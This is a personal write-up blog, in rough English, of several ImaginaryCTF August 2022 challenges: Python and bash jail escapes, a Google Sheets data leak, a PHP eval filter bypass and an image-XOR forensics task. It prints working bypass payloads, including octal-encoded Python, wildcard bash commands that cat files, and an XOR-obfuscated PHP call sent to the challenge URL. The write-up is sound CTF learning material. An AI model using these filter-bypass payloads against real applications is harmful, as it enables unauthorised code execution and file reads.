# ICTF August 2022 ###### tags: `ctf` `forensic` `coding` `linux` Cheers up for my mind and anybody read that WU or blog, so i just want to share some experiences on make save on my mind for challenge and question about ICTF, cool stuffs and pretty strange :smiling_face_with_smiling_eyes_and_hand_covering_mouth:. So let's . I hope u get something about my blog :eagle:. # Misc *Comment: In this month, Misc have some strange questions but it really really fun, not just hack , but also programing, do regex to prevent typing and it will be some true things u will meet on real web or application u use.* :smiley: ## cos2 (30pts) - 04/08 *Description: What is the cosine of 42 radians, rounded to 100 decimal places? Wrap your flag in ictf{}* So it just the math question, the most hard of question in the place how to we get the rounded to 100 decimal places, so it just kind we do some research on the working on your programing languagues. So with me i choose python so i do reasearh and get the flag. Eazy right :coffee: [Some answer for doing with this tasks ](https://stackoverflow.com/questions/4733173/how-can-i-show-an-irrational-number-to-100-decimal-places-in-python). It working for python and do fast with the lib so try hard if you want do it with yourseft. :sweat_smile: So It my anwser for question and it actually the flag. I do it with sympy because it so easy syntax and pre quite short :100: ``` import decimal from sympy import cos print(cos(42).evalf(100)) d = decimal.Decimal(str(cos(42).evalf(100))) print(abs(d.as_tuple().exponent)) ``` Flag: ictf(-0.3999853149883512939547073371772020283804228791424190606167446601513424425835587794388549191368621883) ***ictf solve:*** ``` from mpmath import mp mp.dps = 100 print(f"ictf{{{str(mp.cos(42))}}}") ``` ## _ (75pts) - 16/08 *Description There's this new place I found, but you can't get in with any letters. Think you can find the flag? Flag is in flag.txt.* Attachments https://imaginaryctf.org/f/K3b4S#_.py nc puzzler7.imaginaryctf.org 4005 This is the first of challenge on my struggle week :smiley:. I try to much and closely find the payload to pass this chall and get the flag, but not like dream, I can't do anything but helpless. Today, I read WU on official and see what i miss when to use payload to do something, let analysis challenge. - First of all, we have the python code, the target of author want to spoil something the method for active on server like pwn but not binary we got the python and find the payload comfort for condition of python want to say ``` from builtins import open as _, input as _a, print as _b, eval as _c from unicodedata import normalize as _d from re import search as _e if _e("[\\101-\\132\\141-\\172]", __:=_d("\116\106\113\104", _a(_("_").read()))): _b("|\\|0 3|\\|+|2`/") ______________________ _b(_c(__)) ``` - So we just know how about the **open, input, print, eval** that basic function we will meet and actually meet on the anything python code for making coversation with client and files on the local desktop. - Secondly, we see the normalize that the problem for this code, eval will represent to convert the octa form to ascII form, so we need know what the if condition tell, about - ```_e("[\\101-\\132\\141-\\172]"```, the heck what this, calm down it just the trick the author want to say _e is represent for search function and it do what exacly this tell, find on the string or input the things like that LOL. So we can know the things it octa say, so drop for tools for convert that for me [link](https://onlineasciitools.com/convert-octal-to-ascii) and we get ```A-Z a-z```, *this say ah i will find the input your with the regex if it input not like regex i will pass you can do what actually u want* - And yeah that actually do with input typing we need to recover the function if which so complicate with _a,_b,... and we need to get easy to know that on the readable we can like ``` if search("[A-z a-z]", __:=normalize("NFKD", input(open("_").read()))): print("|\\|0 3|\\|+|2`/") ```  - with normalize with type NFKD it change the composing or decomposing characters, it like change this input shade i think like combine or destroy that it kind little bit hard to know so it function add to make the if condition became complex so skip it and know that like change the shape of string input  - So the what we need is input something to that know what payload it is comfort for that condition and we will get the flag or not we will be kick out to server :cry:. That is all of flag we need to cover to octa ``` exec('__ = 1\nprint(__)') = "\145\170\145\143\050\047\137\137\040\075\040\061\134\156\160\162\151\156\164\050\137\137\051\047\051" 1 + 3 = "\061\053\063" flag.txt = "\146\154\141\147\056\164\170\164" open('flag.txt').read() = "\157\160\145\156\050\047\146\154\141\147\056\164\170\164\047\051\056\162\145\141\144\050\051" ``` - i do some payload above but didn't work anything and the only one the payload is success or accept like this ```_("\146\154\141\147\056\164\170\164")``` it like we need to do open the flag because _ is the acceptable syntax so do it with server and i receive  - so we can't read the file but we can do knowing a flag exist and storage in flag.txt same as directory if we want to flag we need to read this but it have letters so we need to find that and after writeup i know something like ```https://www.tutorialspoint.com/How-does-operator-work-on-list-in-Python``` and that is the last items to change the landscape. - **The star(*) operator unpacks the sequence/collection into positional arguments. So if you have a list and want to pass the items of that list as arguments for each position as they are there in the list, instead of indexing each element individually, you could just use the * operator.** that we we need to combine the * with above payload and place it on tuple or list to do what exactly we need like  - So we need to read do that tuple or list and we will do the things on that not need to read. It will bypass through eval function, quite leak on python and now i know new skill. - Thirdly, do what we know to find the flag with payload like `(*_("\146\154\141\147\056\164\170\164"), )` or `[*_("\146\154\141\147\056\164\170\164"), ]`  - Hard thing but fun :smoking:. Do you ? ## BC Jail (75pts) - 21/08 *Description We've had some hard jail challenges(nameless & stackless). Time for some easy jail! Note: The flag is the name of the flag file + the contents of this file. The flag filename is 22 characters long.* Attachments nc puzzler7.imaginaryctf.org 4008 - Before start chall, i have do some research with BC or nameless & stackless and got something like - [Stackless](https://stackoverflow.com/questions/1016218/how-does-a-stackless-language-work) - [nameless](https://esolangs.org/wiki/Nameless_language) - Some let do netcat and look what we got ``` Welcome to Jail You can't escape! ---------- #!/usr/bin/env python3 import os print("Welcome to Jail You can't escape!") print('-'*10) print(open(__file__).read()) print('-'*10) while True: x = input(">>> ") whitelist = "/bc? " if any([i for i in x if i not in whitelist]): print("I see you are trying to hack, Exiting!") exit(0) else: os.system(x) ---------- ``` - One time in this month ictf want to participant solve the chall with regex and it more difficult than above chall, huh :thinking_face: what can i do? - With the range of BC jail have only B C and jail(/) :sweat_smile: so i not solve that and just read WU because i don't know what this mean. So let do this chall with my knowledge base on WU. Okay :+1: ``` Once you connect to the server, you get the source code. Reading it, we can see we are allowed to use only the characters /bc? . So, we start playing around with bash, we see that ? is very helpful(/b?? == /bin). We can use (/b??/?c?? == /bin/echo) and then use ? for flag file(for example /b??/?c?? ??????? will print the file name jail.py(because of the length) hence /b??/? c?? ?????????????????????? will print the file name (ictf{bre4k1ng_7he_j41l) and then to read it do the same method but except for echo use cat (/b??/c??) and you'll get the flag. ``` - I think it is guessing and we need to try what the syntax is acceptable on this server and yeah they find ? is useful with (/b?? == /bin). Huh :thinking_face: yeah that actually cool stuff because on ly ? can bypass the rule of server, so they actually do that with just bc? and / and like that they can say /c?? is cat and ? will represent for the length of the file like ``` >>> /b??/c?? ??????? #!/usr/bin/env python3 import os print("Welcome to Jail You can't escape!") print('-'*10) print(open(__file__).read()) print('-'*10) while True: x = input(">>> ") whitelist = "/bc? " if any([i for i in x if i not in whitelist]): print("I see you are trying to hack, Exiting!") exit(0) else: os.system(x)>>> ``` - so we can know the ? is represent to the name or alphatbet to create a file with lenth ? = lenth name of file and that we can see the thing we want by typing ? for the file u actually want and on description they said the name of file have 22 length so 22 ? will get content the file ``` >>> /b??/c?? ?????????????????????? _like_4_b0ss!} ``` - so we need the file name i think in linux if we want to see the name of file we need to typing name almost the same and it will return the actually name of file with echo and /b??/?c?? ?????????????????????? is represent for echo ``` >>/b??/?c?? ?????????????????????? /bin/zcat /bin/zcmp ictf{bre4k1ng_7he_j41l ``` - Flag: ictf{bre4k1ng_7he_j41l_like_4_b0ss!} - So do it with your linux ? represent is actually work, it just linux challenge but idk what ? is actually exist so that is new tech i need to learn. Do you like it ? :hearts: # Web *Comment: In this month, i think the web is not hard with myself but puzzling is the one characteristic we need to say about that Web challeges.* :smiley: ## Fake Flag Database (50pts) - 22/08 *We use fake flags a lot, so I've started documenting them, just so no one gets them confused with real flags. There's absolutely no real flags here, and certainly no reason to go searching for one.* *Attachments https://docs.google.com/spreadsheets/d/1ffGO9YKQbMv7f00hFN4C-UFzYghPyk9Bk3Pq7dfmA/edit?usp=sharing* - that is quite fun challenge with search on the excel table on google and u find the payload like this > This was supposed to be a challenge based on https://blog.andrewcantino.com/blog/2019/01/27/why-security-expectations-matter-google-sheets-hidden-content/, but apparently Google fixed it? > > In any case, the first cell on the first sheet is always shown in the source, so simply grepping for the flag gives the flag. > > curl https://docs.google.com/spreadsheets/d/1ffGO9Y_KQbMv7_f00hFN4C-UFzYghPyk9Bk3Pq7dfmA/edit#gid=1335776287 | grep -oP ictf{.*?} - It the method to solve this but with me i find something on the table like [this command](https://pcpl21.org/wp-content/uploads/2020/03/How-To-Import-Data-Into-Google-Sheets-From-Another-Sheet.pdf) because the google form is not permit so i can show u how i find it but it command on excel like this ```=IMPORTRANGE("1ffGO9Y_KQbMv7_f00hFN4C-UFzYghPyk9Bk3Pq7dfmA"; "Backend!B:B")``` and it got the fake flag so do with create new sheet and do with A column or C column because it will storage on that, it just guessy but it will like that so change that ```=IMPORTRANGE("1ffGO9Y_KQbMv7_f00hFN4C-UFzYghPyk9Bk3Pq7dfmA"; "Backend!A:A")``` and yeah we can get the flag like this  - Flag: ictf{nothing_is_hidden_nothing_is_safe} ## phpsucks (75pts) - 29/08 *Description I have an eval but with a robust user input validation.* *Attachments http://puzzler7.imaginaryctf.org:4011/* So first of all, access the web and see what the web say  - Firstly, it use php language and yeah that is the good new to solve that, and with wappalyzer i know the version of php is 7.4.30 and that all the infomation i find with chall. - Secondly, Analysis the coding, we knew: - We need to do secret_function() and we will get the flag - And it have parameter to pass is cmd so we just add route /?cmd= "content what you typing". - We need to know the one thing is if condition and it check the regex, so again we back regex and now it on php and again we meet eval() What concident in this month !:smiling_face_with_smiling_eyes_and_hand_covering_mouth:. We pass we get flag we not pass we get the try harder !! - So thanks for **s1lver8ulle7**, find this thing and it the point to solving this chall call [bypass waf php webshell](https://securityonline.info/bypass-waf-php-webshell-without-numbers-letters/)<br> - So with bypass waf php webshell, the theory is really basic because it deny the numberic or words so we just use symbol and the thing to do that we can do the xor because u need to know the eval function can perform math operations and so we need convert the secret_function to symbol and do xor on url and yeah we can find the flag, just not miss assign it with to call that $function. :smiley_cat: with [php complier](https://www.w3schools.com/php/phptryit.asp?filename=tryphp_compiler) - So easy way to do that is xor with _ is the best way to convert all of that to symbol shape because if we do the ?< it will convert number and word and it just the err will occur  - So do it like this and yeah perfect  but it fail because it just contain secret not contain _ function so we need to find other, it the hard way to find this. Yeah i stuck on this but with WU i find some like this ```_____/}=_@_/@@.``` and it save mind :cry:  Perfectly so we assign what for the function and call that because the type we passing to url is string and not to cat with () so we need to assign and call that it will actually work with that type.  - Exploit that web with that payload ```http://puzzler7.imaginaryctf.org:4011/?cmd=$_=%27,:%3C-:[%22[*.%3C[)/@%27^%22_____/}=@/@@.%22;$_();``` Flag: ictf{th3r3_4r3_n0_l4ngu4g3_l1k3_Php} # Forensics/crypto ## Shady Penguins (75pts) - 20/08 *Description Roo has spotted some shady Penguins passing files to each other and finally got his paws on a pair. What are these Penguins up to?* *Attachments https://imaginaryctf.org/f/jJH2d#Spy https://imaginaryctf.org/f/wooKe#Penguins* It quite littebit easy chall, so we need to read what actually mean of decripstion is talk, it say we got the the pair of the paw of penguige what this mean not concident if why got 2 of image tell something. :thought_balloon: - So i use HxD to see the hexditor because it not a file can open   - Look on the the hex of 2 file i read something - it the png file and yeah it had same header like  - if i do it binwalk i think it will return the same size between them and yeah actually it does  - So i think the thing we need to do is combine or xor image and what different because it have same thing on that but not see actually on naked eye so use stegsolve to cause magic :smiley:   The new magic actually occur and yeah on the middle of image we get the flag  Flag ictf{visual_crypto_is_neato} --- # Sum up: Yeah, that all chall i do and write blog something about that, quite fun, new skill and new err. Haha so i will be back on next month and hope u can learn something greate from this. Peace :+1:. And little one thing i will solve the hardest forensics i see on ctf contest yeah it on series ictf but on the other blog so look at this :accept: